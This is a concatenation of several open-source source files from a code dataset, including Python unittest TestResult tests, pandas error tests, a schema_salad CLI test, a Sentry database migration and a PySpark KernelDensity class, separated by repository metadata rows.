# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
def test_addSubTest(self):
class Foo(unittest.TestCase):
def test_1(self):
nonlocal subtest
with self.subTest(foo=1):
subtest = self._subtest
try:
1/0
except ZeroDivisionError:
exc_info_tuple = sys.exc_info()
# Register an error by hand (to check the API)
result.addSubTest(test, subtest, exc_info_tuple)
# Now trigger a failure
self.fail("some recognizable failure")
subtest = None
test = Foo('test_1')
result = unittest.TestResult()
test.run(result)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, subtest)
self.assertIn("ZeroDivisionError", formatted_exc)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, subtest)
self.assertIn("some recognizable failure", formatted_exc)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
def testGetSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1, bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) (bar=2, foo=1)')
with self.subTest('some message'):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) [some message]')
def testGetSubTestDescriptionWithoutDocstringAndParams(self):
with self.subTest():
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstringAndParams '
'(' + __name__ + '.Test_TestResult) (<subtest>)')
def testGetNestedSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1):
with self.subTest(bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetNestedSubTestDescriptionWithoutDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
runner = unittest.TextTestRunner(stream=io.StringIO(), failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with support.check_warnings(("TestResult has no add.+ method,",
RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
    def testOldTestResultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class MockTraceback(object):
@staticmethod
def format_exception(*_):
return ['A traceback']
def restore_traceback():
unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetupClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferSetUpModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
if __name__ == '__main__':
unittest.main()
| mit | -7,849,459,376,710,542,000 | 7,192,695,846,796,605,000 | 34.222727 | 94 | 0.601669 | false |
winklerand/pandas | pandas/tests/test_errors.py | 9 | 1147 | # -*- coding: utf-8 -*-
import pytest
from warnings import catch_warnings
import pandas # noqa
import pandas as pd
@pytest.mark.parametrize(
"exc", ['UnsupportedFunctionCall', 'UnsortedIndexError',
'OutOfBoundsDatetime',
'ParserError', 'PerformanceWarning', 'DtypeWarning',
'EmptyDataError', 'ParserWarning', 'MergeError'])
def test_exception_importable(exc):
from pandas import errors
e = getattr(errors, exc)
assert e is not None
# check that we can raise on them
with pytest.raises(e):
raise e()
def test_catch_oob():
from pandas import errors
try:
pd.Timestamp('15000101')
except errors.OutOfBoundsDatetime:
pass
def test_error_rename():
# see gh-12665
from pandas.errors import ParserError
from pandas.io.common import CParserError
try:
raise CParserError()
except ParserError:
pass
try:
raise ParserError()
except CParserError:
pass
with catch_warnings(record=True):
try:
raise ParserError()
except pd.parser.CParserError:
pass
| bsd-3-clause | 725,341,335,641,220,500 | 3,159,329,562,362,107,400 | 21.057692 | 64 | 0.634699 | false |
mr-c/common-workflow-language | v1.0/salad/schema_salad/tests/test_cli_args.py | 8 | 1199 | from __future__ import absolute_import
import unittest
import sys
import schema_salad.main as cli_parser
# for capturing print() output
from contextlib import contextmanager
from six import StringIO
@contextmanager
def captured_output():
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
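def _example_captured_output():
    # Editor's note: hedged example, not part of the original test module.
    # Anything printed inside the with-block lands in the StringIO buffers
    # instead of the real streams, which is how the tests below read the
    # parser's output.
    with captured_output() as (out, err):
        print("hello")
    return out.getvalue().strip()  # -> "hello"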
""" test different sets of command line arguments"""
class ParseCliArgs(unittest.TestCase):
def test_version(self):
args = [["--version"], ["-v"]]
for arg in args:
with captured_output() as (out, err):
cli_parser.main(arg)
response = out.getvalue().strip() # capture output and strip newline
self.assertTrue("Current version" in response)
def test_empty_input(self):
        # running schema_salad tool without any args
args = []
with captured_output() as (out, err):
cli_parser.main(args)
response = out.getvalue().strip()
self.assertTrue("error: too few arguments" in response)
| apache-2.0 | 1,940,569,490,076,599,800 | 130,690,207,704,001,700 | 28.243902 | 81 | 0.636364 | false |
NickPresta/sentry | src/sentry/migrations/0032_auto__add_eventmeta.py | 7 | 14351 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupMeta'
db.create_table('sentry_groupmeta', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('group', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sentry.Group'])),
('key', self.gf('django.db.models.fields.CharField')(max_length=64)),
('value', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('sentry', ['GroupMeta'])
        # Adding unique constraint on 'GroupMeta', fields ['group', 'key']
db.create_unique('sentry_groupmeta', ['group_id', 'key'])
def backwards(self, orm):
        # Removing unique constraint on 'GroupMeta', fields ['group', 'key']
db.delete_unique('sentry_groupmeta', ['group_id', 'key'])
# Deleting model 'GroupMeta'
db.delete_table('sentry_groupmeta')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key', 'value'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project_set'", 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
| bsd-3-clause | -4,734,808,023,905,289,000 | 3,127,048,765,870,081,000 | 75.743316 | 182 | 0.54714 | false |
skonto/spark | python/pyspark/mllib/stat/KernelDensity.py | 118 | 1997 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
if sys.version > '3':
xrange = range
import numpy as np
from pyspark.mllib.common import callMLlibFunc
from pyspark.rdd import RDD
class KernelDensity(object):
"""
Estimate probability density at required points given an RDD of samples
from the population.
>>> kd = KernelDensity()
>>> sample = sc.parallelize([0.0, 1.0])
>>> kd.setSample(sample)
>>> kd.estimate([0.0, 1.0])
array([ 0.12938758, 0.12938758])
"""
def __init__(self):
self._bandwidth = 1.0
self._sample = None
def setBandwidth(self, bandwidth):
"""Set bandwidth of each sample. Defaults to 1.0"""
self._bandwidth = bandwidth
def setSample(self, sample):
"""Set sample points from the population. Should be a RDD"""
if not isinstance(sample, RDD):
raise TypeError("samples should be a RDD, received %s" % type(sample))
self._sample = sample
def estimate(self, points):
"""Estimate the probability density at points"""
points = list(points)
densities = callMLlibFunc(
"estimateKernelDensity", self._sample, self._bandwidth, points)
return np.asarray(densities)
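# Editor's note: hedged usage example, not part of the original file. `sc` is
# assumed to be an existing SparkContext; the sample values are illustrative,
# and a larger bandwidth yields a smoother estimate.
def _example_kernel_density(sc):
    kd = KernelDensity()
    kd.setSample(sc.parallelize([0.0, 1.0, 2.0, 4.0]))
    kd.setBandwidth(3.0)
    return kd.estimate([0.5, 2.5])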
| apache-2.0 | -8,330,590,797,848,630,000 | 7,114,226,807,353,699,000 | 32.847458 | 82 | 0.684527 | false |
kvar/ansible | test/units/modules/network/cnos/test_cnos_logging.py | 23 | 2268 | #
